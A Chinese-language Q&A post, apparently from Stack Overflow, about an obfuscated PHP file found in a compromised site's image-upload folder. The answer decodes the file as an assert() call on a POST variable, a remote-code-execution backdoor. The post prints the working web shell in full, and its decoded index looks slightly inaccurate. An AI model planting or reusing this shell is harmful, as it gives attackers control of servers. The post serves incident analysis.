最近我发现我的项目被黑了,我在我的images文件夹中找到了一个脚本,其中有一个用户上传图片的目录(使用文件输入)。这是我在目录中找到的脚本。
errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>
答案 0 :(得分:4)
此代码隐藏以下声明:
@assert ($_POST[025]);
这意味着它将在POST变量“025”中执行PHP代码发送。所以,是的,这确实是一个后门!我建议在security.stackexchange.com上询问如何正确处理后果。